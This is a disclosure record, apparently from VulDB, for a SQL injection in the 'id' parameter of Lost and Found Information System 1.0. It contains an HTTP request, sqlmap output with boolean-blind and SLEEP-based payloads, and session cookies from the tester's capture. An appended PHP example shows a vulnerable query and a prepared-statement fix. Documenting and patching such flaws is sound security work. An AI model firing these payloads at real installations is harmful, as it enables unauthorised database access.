Submission #155230 Info: SQL Injection in view category function in Lost and Found Information System

Title: SQL Injection in view category function in Lost and Found Information System

Description: SQL Injection in view category function in Lost and Found Information System 1.0

Parameter: id
Product: Lost and Found Information System
Version: 1.0

PoC:

Request:

GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/php-lfis/admin/?page=categories
Connection: close
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Run request with sqlmap and output:

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb
---
Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: huutuanbg97 (UID 45015)
Submitted: 2023-05-11 17:32 (3 years ago)
Moderated: 2023-05-12 08:01 (14 hours later)
Status: Accepted
VulDB Entry: 228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category id SQL Injection]
Points: 20
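As an added, illustrative example (not code from the Lost and Found Information System, whose source is not shown in this submission): the quoted string-concatenation shape that the PoC payloads imply, beside a hardened handler that validates the id as an integer and binds it through a prepared statement. The mysqli handle $conn and the `categories` table with its id and name columns are assumptions.

```php
<?php
// Illustrative reconstruction, not the application's own code.
// Assumed: a mysqli connection $conn and a table `categories` (id, name).

// BEFORE (vulnerable): the id parameter is pasted into a quoted SQL string.
// A value such as  2' AND 9766=9766 AND 'VGnK'='VGnK  closes the quote and
// appends attacker-controlled SQL, which is what the sqlmap output reports.
function view_category_vulnerable(mysqli $conn, array $get): ?array {
    $sql = "SELECT id, name FROM `categories` WHERE id = '{$get['id']}'";
    $res = $conn->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// AFTER (hardened): check the type first, then bind the value.
function view_category_safe(mysqli $conn, array $get): ?array {
    // id must be a positive integer; anything else never reaches SQL.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    // Prepared statement: the value travels as a bound parameter, not as SQL text,
    // so neither the boolean-based nor the SLEEP()-based payload can alter the query.
    $stmt = $conn->prepare("SELECT id, name FROM `categories` WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Page handler for ?page=categories/view_category&id=<n> (assumes $conn is connected).
$category = view_category_safe($conn, $_GET);
```

Casting to int alone would also close this hole for a numeric id; the prepared statement is kept so the same pattern carries over to the non-numeric parameters in the rest of the application.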
